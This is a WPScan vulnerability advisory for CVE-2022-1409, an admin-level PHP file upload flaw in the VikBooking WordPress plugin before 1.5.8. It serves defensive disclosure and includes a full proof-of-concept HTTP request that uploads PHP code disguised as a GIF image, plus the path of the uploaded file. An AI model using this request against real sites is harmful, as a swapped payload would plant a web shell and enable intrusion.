WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact
WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

VikBooking Hotel Booking Engine & PMS < 1.5.8 - Admin+ PHP File Upload

Description

The plugin does not properly validate images, allowing high privilege users such as administrators to upload PHP files disguised as images and containing malicious PHP code

Proof of Concept

Edit/add a Characteristics (/wp-admin/admin.php?option=com_vikbooking&task=carat) and upload a fake GIF with PHP code in it as a Characteristic Image:

POST /wp-admin/admin.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------119541905442224294322517652959
Content-Length: 1469
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="caratname"

WiFi
-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="caraticon"; filename="phpinfo.php"
Content-Type: image/gif

GIF89a;
<?php phpinfo() ?>

-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="resizeto"

250
-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="carattextimg"

<i class="fas fa-wifi vbo-icn-carat vbo-pref-color-text"></i>
-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="ordering"

1
-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="task"

updatecarat
-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="whereup"

1
-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="option"

com_vikbooking
-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="vikwp_nonce"

2817d7732a
-----------------------------119541905442224294322517652959--


PHP file will be at https://example.com/m/wp-content/plugins/vikbooking/site/resources/uploads/phpinfo.php 


 

Affects Plugins

vikbooking
Fixed in version 1.5.8

References

CVE
CVE-2022-1409

Classification

Type

UPLOAD

CWE
CWE-434

Miscellaneous

Original Researcher

Gabriel3476

Submitter

Gabriel3476

Submitter website
https://github.com/Gabriel3476/
Verified

Yes

WPVDB ID
1330f8f7-4a59-4e9d-acae-21656a4101fe

Timeline

Publicly Published

2022-04-21 (about 2 months ago)

Added

2022-04-21 (about 2 months ago)

Last Updated

2022-04-22 (about 2 months ago)

Our Other Services

WPScan WordPress Security Plugin
WPScan

Vulnerabilities

WordPressPluginsThemesOur StatsSubmit vulnerabilities

About

How it worksPricingWordPress pluginNewsContact

For Developers

StatusAPI detailsCLI scanner

Other

PrivacyTerms of serviceDisclosure policy
jetpackIn partnership with Jetpack
githubtwitterfacebook
Angithubendeavor
Work With Us